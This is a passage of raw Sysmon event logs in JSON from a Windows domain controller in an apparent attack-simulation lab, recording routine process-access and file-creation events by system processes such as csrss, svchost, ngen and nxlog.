07:02:19.419","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00109D7B0F00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8537,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:19.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137B-5F25-0000-00109D7B0F00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:19.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137B-5F25-0000-00109D7B0F00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8538,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:19.966\r\nProcessGuid: {E2A3D6B1-137B-5F25-0000-00109D7B0F00}\r\nProcessId: 2984\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ba8-0\\System.Security.dll\r\nCreationUtcTime: 2020-08-01 07:02:19.966","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:19.966","ProcessGuid":"{E2A3D6B1-137B-5F25-0000-00109D7B0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ba8-0\\System.Security.dll","CreationUtcTime":"2020-08-01 07:02:19.966","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8539,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.013\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137C-5F25-0000-0010887F0F00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.013","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137C-5F25-0000-0010887F0F00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8540,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.013\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137C-5F25-0000-0010887F0F00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.013","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137C-5F25-0000-0010887F0F00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8541,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.013\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137C-5F25-0000-0010887F0F00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.013","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137C-5F25-0000-0010887F0F00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8542,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.060\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.060","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8543,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.248\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1355-5F25-0000-00109C400E00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.248","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1355-5F25-0000-00109C400E00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8544,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.248\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1355-5F25-0000-00109C400E00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:20.248","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1355-5F25-0000-00109C400E00}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8545,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:20.248\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1355-5F25-0000-00109C400E00}\r\nTargetProcessId: 2716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 